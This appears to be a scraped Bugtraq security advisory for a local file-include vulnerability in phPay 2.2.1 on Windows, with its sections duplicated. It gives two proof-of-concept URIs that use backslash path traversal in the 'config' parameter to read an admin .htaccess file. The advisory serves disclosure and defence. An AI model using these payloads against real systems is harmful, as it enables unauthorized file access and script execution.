phPay Windows Installations Local File Include Vulnerability
BID:26881
Info
phPay Windows Installations Local File Include Vulnerability
| Bugtraq ID: | 26881 |
| Class: | Input Validation Error |
| CVE: |
CVE-2007-6471 |
| Remote: | Yes |
| Local: | No |
| Published: | Dec 15 2007 12:00AM |
| Updated: | May 07 2015 05:34PM |
| Credit: | Michael Brooks is credited with the discovery of this vulnerability. |
| Vulnerable: |
phPay phPay 2.2.1 |
| Not Vulnerable: | |
Discussion
phPay Windows Installations Local File Include Vulnerability
phPay is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input. The vulnerability resides in code that was intended to protect against file-include attacks. It was found that the protection routines may be bypassed on Windows installations.
Exploiting this issue may allow an unauthorized user to view files and execute local scripts.
phPay is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input. The vulnerability resides in code that was intended to protect against file-include attacks. It was found that the protection routines may be bypassed on Windows installations.
Exploiting this issue may allow an unauthorized user to view files and execute local scripts.
Exploit / POC
phPay Windows Installations Local File Include Vulnerability
Attackers can exploit this issue via a browser.
The following proof-of-concept URI is available:
http://www.example.com/phpayv2.02a/main.php?config=eregi.inc.php\\..\\admin\\.htaccess
The following example was provided in cases where the PHP 'magic_quotes_gpc' directive is enabled:
http://www.example.com/phpayv2.02a/main.php?config=eregi.inc.php\..\admin\.htaccess
Attackers can exploit this issue via a browser.
The following proof-of-concept URI is available:
http://www.example.com/phpayv2.02a/main.php?config=eregi.inc.php\\..\\admin\\.htaccess
The following example was provided in cases where the PHP 'magic_quotes_gpc' directive is enabled:
http://www.example.com/phpayv2.02a/main.php?config=eregi.inc.php\..\admin\.htaccess
Solution / Fix
phPay Windows Installations Local File Include Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
phPay Windows Installations Local File Include Vulnerability
References:
References: